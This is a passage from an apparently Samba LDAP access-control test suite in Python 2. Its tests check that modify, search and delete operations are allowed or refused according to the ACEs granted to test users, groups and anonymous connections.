dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % self.get_user_dn("test_modify_user1"))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Second test object -- Group
print "Testing modify on Group object"
self.ldb_admin.newgroup("test_modify_group1", grouptype=4)
self.sd_utils.dacl_add_ace("CN=test_modify_group1,CN=Users," + self.base_dn, mod)
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % str("CN=test_modify_group1,CN=Users," + self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Third test object -- Organizational Unit
print "Testing modify on OU object"
#delete_force(self.ldb_admin, "OU=test_modify_ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=test_modify_ou1," + self.base_dn)
self.sd_utils.dacl_add_ace("OU=test_modify_ou1," + self.base_dn, mod)
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" % str("OU=test_modify_ou1," + self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
def test_modify_u2(self):
"""6 Modify two attributes as you have DS_WRITE_PROPERTY granted only for one of them"""
mod = "(OA;;WP;bf967953-0de6-11d0-a285-00aa003049e2;;%s)" % str(self.user_sid)
# First test object -- User
print "Testing modify on User object"
#delete_force(self.ldb_admin, self.get_user_dn("test_modify_user1"))
self.ldb_admin.newuser("test_modify_user1", self.user_pass)
self.sd_utils.dacl_add_ace(self.get_user_dn("test_modify_user1"), mod)
# Modify on attribute you have rights for
ldif = """
dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" %
self.get_user_dn("test_modify_user1"))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Modify on attribute you do not have rights for granted
ldif = """
dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Second test object -- Group
print "Testing modify on Group object"
self.ldb_admin.newgroup("test_modify_group1", grouptype=4)
self.sd_utils.dacl_add_ace("CN=test_modify_group1,CN=Users," + self.base_dn, mod)
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" %
str("CN=test_modify_group1,CN=Users," + self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Modify on attribute you do not have rights for granted
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Second test object -- Organizational Unit
print "Testing modify on OU object"
self.ldb_admin.create_ou("OU=test_modify_ou1," + self.base_dn)
self.sd_utils.dacl_add_ace("OU=test_modify_ou1," + self.base_dn, mod)
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: displayName
displayName: test_changed"""
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn,
expression="(distinguishedName=%s)" % str("OU=test_modify_ou1,"
+ self.base_dn))
self.assertEqual(res[0]["displayName"][0], "test_changed")
# Modify on attribute you do not have rights for granted
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
def test_modify_u3(self):
"""7 Modify one attribute as you have no what so ever rights granted"""
# First test object -- User
print "Testing modify on User object"
self.ldb_admin.newuser("test_modify_user1", self.user_pass)
# Modify on attribute you do not have rights for granted
ldif = """
dn: """ + self.get_user_dn("test_modify_user1") + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Second test object -- Group
print "Testing modify on Group object"
self.ldb_admin.newgroup("test_modify_group1", grouptype=4)
# Modify on attribute you do not have rights for granted
ldif = """
dn: CN=test_modify_group1,CN=Users,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
# Second test object -- Organizational Unit
print "Testing modify on OU object"
#delete_force(self.ldb_admin, "OU=test_modify_ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=test_modify_ou1," + self.base_dn)
# Modify on attribute you do not have rights for granted
ldif = """
dn: OU=test_modify_ou1,""" + self.base_dn + """
changetype: modify
replace: url
url: www.samba.org"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
def test_modify_u4(self):
"""11 Grant WP to PRINCIPAL_SELF and test modify"""
ldif = """
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
add: adminDescription
adminDescription: blah blah blah"""
try:
self.ldb_user.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
mod = "(OA;;WP;bf967919-0de6-11d0-a285-00aa003049e2;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
# Modify on attribute you have rights for
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search(self.base_dn, expression="(distinguishedName=%s)" \
% self.get_user_dn(self.user_with_wp), attrs=["adminDescription"] )
self.assertEqual(res[0]["adminDescription"][0], "blah blah blah")
def test_modify_u5(self):
"""12 test self membership"""
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: """ + self.get_user_dn(self.user_with_sm)
#the user has no rights granted, this should fail
try:
self.ldb_user2.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
# This 'modify' operation should always throw ERR_INSUFFICIENT_ACCESS_RIGHTS
self.fail()
#grant self-membership, should be able to add himself
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.user_with_sm))
mod = "(OA;;SW;bf9679c0-0de6-11d0-a285-00aa003049e2;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("CN=test_modify_group2,CN=Users," + self.base_dn, mod)
self.ldb_user2.modify_ldif(ldif)
res = self.ldb_admin.search( self.base_dn, expression="(distinguishedName=%s)" \
% ("CN=test_modify_group2,CN=Users," + self.base_dn), attrs=["Member"])
self.assertEqual(res[0]["Member"][0], self.get_user_dn(self.user_with_sm))
#but not other users
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: CN=test_modify_user2,CN=Users,""" + self.base_dn
try:
self.ldb_user2.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_modify_u6(self):
"""13 test self membership"""
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: """ + self.get_user_dn(self.user_with_sm) + """
Member: CN=test_modify_user2,CN=Users,""" + self.base_dn
#grant self-membership, should be able to add himself but not others at the same time
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.user_with_sm))
mod = "(OA;;SW;bf9679c0-0de6-11d0-a285-00aa003049e2;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("CN=test_modify_group2,CN=Users," + self.base_dn, mod)
try:
self.ldb_user2.modify_ldif(ldif)
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_modify_u7(self):
"""13 User with WP modifying Member"""
#a second user is given write property permission
user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.user_with_wp))
mod = "(A;;WP;;;%s)" % str(user_sid)
self.sd_utils.dacl_add_ace("CN=test_modify_group2,CN=Users," + self.base_dn, mod)
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: """ + self.get_user_dn(self.user_with_wp)
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search( self.base_dn, expression="(distinguishedName=%s)" \
% ("CN=test_modify_group2,CN=Users," + self.base_dn), attrs=["Member"])
self.assertEqual(res[0]["Member"][0], self.get_user_dn(self.user_with_wp))
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
delete: Member"""
self.ldb_user.modify_ldif(ldif)
ldif = """
dn: CN=test_modify_group2,CN=Users,""" + self.base_dn + """
changetype: modify
add: Member
Member: CN=test_modify_user2,CN=Users,""" + self.base_dn
self.ldb_user.modify_ldif(ldif)
res = self.ldb_admin.search( self.base_dn, expression="(distinguishedName=%s)" \
% ("CN=test_modify_group2,CN=Users," + self.base_dn), attrs=["Member"])
self.assertEqual(res[0]["Member"][0], "CN=test_modify_user2,CN=Users," + self.base_dn)
def test_modify_anonymous(self):
"""Test add operation with anonymous user"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
self.ldb_admin.newuser("test_anonymous", "samba123@")
m = Message()
m.dn = Dn(anonymous, self.get_user_dn("test_anonymous"))
m["description"] = MessageElement("sambauser2",
FLAG_MOD_ADD,
"description")
try:
anonymous.modify(m)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
#enable these when we have search implemented
class AclSearchTests(AclTests):
def setUp(self):
super(AclSearchTests, self).setUp()
self.u1 = "search_u1"
self.u2 = "search_u2"
self.u3 = "search_u3"
self.group1 = "group1"
self.ldb_admin.newuser(self.u1, self.user_pass)
self.ldb_admin.newuser(self.u2, self.user_pass)
self.ldb_admin.newuser(self.u3, self.user_pass)
self.ldb_admin.newgroup(self.group1, grouptype=-2147483646)
self.ldb_admin.add_remove_group_members(self.group1, self.u2,
add_members_operation=True)
self.ldb_user = self.get_ldb_connection(self.u1, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.u2, self.user_pass)
self.ldb_user3 = self.get_ldb_connection(self.u3, self.user_pass)
self.full_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou4,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)]
self.user_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.u1))
self.group_sid = self.sd_utils.get_object_sid(self.get_user_dn(self.group1))
def create_clean_ou(self, object_dn):
""" Base repeating setup for unittests to follow """
res = self.ldb_admin.search(base=self.base_dn, scope=SCOPE_SUBTREE, \
expression="distinguishedName=%s" % object_dn)
# Make sure top testing OU has been deleted before starting the test
self.assertEqual(len(res), 0)
self.ldb_admin.create_ou(object_dn)
desc_sddl = self.sd_utils.get_sd_as_sddl(object_dn)
# Make sure there are inheritable ACEs initially
self.assertTrue("CI" in desc_sddl or "OI" in desc_sddl)
# Find and remove all inherit ACEs
res = re.findall("\(.*?\)", desc_sddl)
res = [x for x in res if ("CI" in x) or ("OI" in x)]
for x in res:
desc_sddl = desc_sddl.replace(x, "")
# Add flag 'protected' in both DACL and SACL so no inherit ACEs
# can propagate from above
# remove SACL, we are not interested
desc_sddl = desc_sddl.replace(":AI", ":AIP")
self.sd_utils.modify_sd_on_dn(object_dn, desc_sddl)
# Verify all inheritable ACEs are gone
desc_sddl = self.sd_utils.get_sd_as_sddl(object_dn)
self.assertFalse("CI" in desc_sddl)
self.assertFalse("OI" in desc_sddl)
def tearDown(self):
super(AclSearchTests, self).tearDown()
delete_force(self.ldb_admin, "OU=test_search_ou2,OU=test_search_ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=test_search_ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, "OU=ou1," + self.base_dn)
delete_force(self.ldb_admin, self.get_user_dn("search_u1"))
delete_force(self.ldb_admin, self.get_user_dn("search_u2"))
delete_force(self.ldb_admin, self.get_user_dn("search_u3"))
delete_force(self.ldb_admin, self.get_user_dn("group1"))
def test_search_anonymous1(self):
"""Verify access of rootDSE with the correct request"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
res = anonymous.search("", expression="(objectClass=*)", scope=SCOPE_BASE)
self.assertEquals(len(res), 1)
#verify some of the attributes
#dont care about values
self.assertTrue("ldapServiceName" in res[0])
self.assertTrue("namingContexts" in res[0])
self.assertTrue("isSynchronized" in res[0])
self.assertTrue("dsServiceName" in res[0])
self.assertTrue("supportedSASLMechanisms" in res[0])
self.assertTrue("isGlobalCatalogReady" in res[0])
self.assertTrue("domainControllerFunctionality" in res[0])
self.assertTrue("serverName" in res[0])
def test_search_anonymous2(self):
"""Make sure we cannot access anything else"""
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
try:
res = anonymous.search("", expression="(objectClass=*)", scope=SCOPE_SUBTREE)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
try:
res = anonymous.search(self.base_dn, expression="(objectClass=*)", scope=SCOPE_SUBTREE)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
try:
res = anonymous.search("CN=Configuration," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
except LdbError, (num, _):
self.assertEquals(num, ERR_OPERATIONS_ERROR)
else:
self.fail()
def test_search_anonymous3(self):
"""Set dsHeuristics and repeat"""
self.ldb_admin.set_dsheuristics("0000002")
self.ldb_admin.create_ou("OU=test_search_ou1," + self.base_dn)
mod = "(A;CI;LC;;;AN)"
self.sd_utils.dacl_add_ace("OU=test_search_ou1," + self.base_dn, mod)
self.ldb_admin.create_ou("OU=test_search_ou2,OU=test_search_ou1," + self.base_dn)
anonymous = SamDB(url=ldaphost, credentials=self.creds_tmp, lp=lp)
res = anonymous.search("OU=test_search_ou2,OU=test_search_ou1," + self.base_dn,
expression="(objectClass=*)", scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
self.assertTrue("dn" in res[0])
self.assertTrue(res[0]["dn"] == Dn(self.ldb_admin,
"OU=test_search_ou2,OU=test_search_ou1," + self.base_dn))
res = anonymous.search("CN=Configuration," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
self.assertTrue("dn" in res[0])
self.assertTrue(res[0]["dn"] == Dn(self.ldb_admin, self.configuration_dn))
def test_search1(self):
"""Make sure users can see us if given LC to user and group"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;;LC;;;%s)(A;;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
#regular users must see only ou1 and ou2
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 2)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn)]
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
#these users should see all ous
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 6)
res_list = [ x["dn"] for x in res if x["dn"] in self.full_list ]
self.assertEquals(sorted(res_list), sorted(self.full_list))
res = self.ldb_user2.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 6)
res_list = [ x["dn"] for x in res if x["dn"] in self.full_list ]
self.assertEquals(sorted(res_list), sorted(self.full_list))
def test_search2(self):
"""Make sure users can't see us if access is explicitly denied"""
self.create_clean_ou("OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn)
self.ldb_admin.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)
mod = "(D;;LC;;;%s)(D;;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
#this user should see all ous
res_list = [ x["dn"] for x in res if x["dn"] in self.full_list ]
self.assertEquals(sorted(res_list), sorted(self.full_list))
#these users should see ou1, 2, 5 and 6 but not 3 and 4
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)]
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
res = self.ldb_user2.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 4)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search3(self):
"""Make sure users can't see ous if access is explicitly denied - 2"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;LC;;;%s)(A;CI;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_admin.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
print "Testing correct behavior on nonaccessible search base"
try:
self.ldb_user3.search("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_BASE)
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
else:
self.fail()
mod = "(D;;LC;;;%s)(D;;LC;;;%s)" % (str(self.user_sid), str(self.group_sid))
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn)]
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn)]
#should not see ou3 and ou4, but should see ou5 and ou6
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 4)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
res = self.ldb_user2.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 4)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search4(self):
"""There is no difference in visibility if the user is also creator"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;CC;;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_user.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou5,OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou6,OU=ou4,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
ok_list = [Dn(self.ldb_admin, "OU=ou2,OU=ou1," + self.base_dn),
Dn(self.ldb_admin, "OU=ou1," + self.base_dn)]
res = self.ldb_user3.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 2)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 2)
res_list = [ x["dn"] for x in res if x["dn"] in ok_list ]
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search5(self):
"""Make sure users can see only attributes they are allowed to see"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;LC;;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
# assert user can only see dn
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = ['dn']
self.assertEquals(len(res), 1)
res_list = res[0].keys()
self.assertEquals(res_list, ok_list)
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_BASE, attrs=["ou"])
self.assertEquals(len(res), 1)
res_list = res[0].keys()
self.assertEquals(res_list, ok_list)
#give read property on ou and assert user can only see dn and ou
mod = "(OA;;RP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = ['dn', 'ou']
self.assertEquals(len(res), 1)
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
#give read property on Public Information and assert user can see ou and other members
mod = "(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou2,OU=ou1," + self.base_dn, expression="(objectClass=*)",
scope=SCOPE_SUBTREE)
ok_list = ['dn', 'objectClass', 'ou', 'distinguishedName', 'name', 'objectGUID', 'objectCategory']
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
def test_search6(self):
"""If an attribute that cannot be read is used in a filter, it is as if the attribute does not exist"""
self.create_clean_ou("OU=ou1," + self.base_dn)
mod = "(A;CI;LCCC;;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou1," + self.base_dn, mod)
tmp_desc = security.descriptor.from_sddl("D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" + mod,
self.domain_sid)
self.ldb_admin.create_ou("OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
self.ldb_user.create_ou("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, sd=tmp_desc)
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(ou=ou3)",
scope=SCOPE_SUBTREE)
#nothing should be returned as ou is not accessible
self.assertEquals(len(res), 0)
#give read property on ou and assert user can only see dn and ou
mod = "(OA;;RP;bf9679f0-0de6-11d0-a285-00aa003049e2;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou3,OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(ou=ou3)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
ok_list = ['dn', 'ou']
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
#give read property on Public Information and assert user can see ou and other members
mod = "(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;%s)" % (str(self.user_sid))
self.sd_utils.dacl_add_ace("OU=ou2,OU=ou1," + self.base_dn, mod)
res = self.ldb_user.search("OU=ou1," + self.base_dn, expression="(ou=ou2)",
scope=SCOPE_SUBTREE)
self.assertEquals(len(res), 1)
ok_list = ['dn', 'objectClass', 'ou', 'distinguishedName', 'name', 'objectGUID', 'objectCategory']
res_list = res[0].keys()
self.assertEquals(sorted(res_list), sorted(ok_list))
#tests on ldap delete operations
class AclDeleteTests(AclTests):
def setUp(self):
super(AclDeleteTests, self).setUp()
self.regular_user = "acl_delete_user1"
# Create regular user
self.ldb_admin.newuser(self.regular_user, self.user_pass)
self.ldb_user = self.get_ldb_connection(self.regular_user, self.user_pass)
def tearDown(self):
super(AclDeleteTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn("test_delete_user1"))
delete_force(self.ldb_admin, self.get_user_dn(self.regular_user))
delete_force(self.ldb_admin, self.get_user_dn("test_anonymous"))
def test_delete_u1(self):
"""User is prohibited by default to delete another User object"""
# Create user that we try to delete
self.ldb_admin.newuser("test_delete_user1", self.user_pass)
# Here delete User object should ALWAYS through exception
try:
self.ldb_user.delete(self.get_user_dn("test_delete_user1"))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
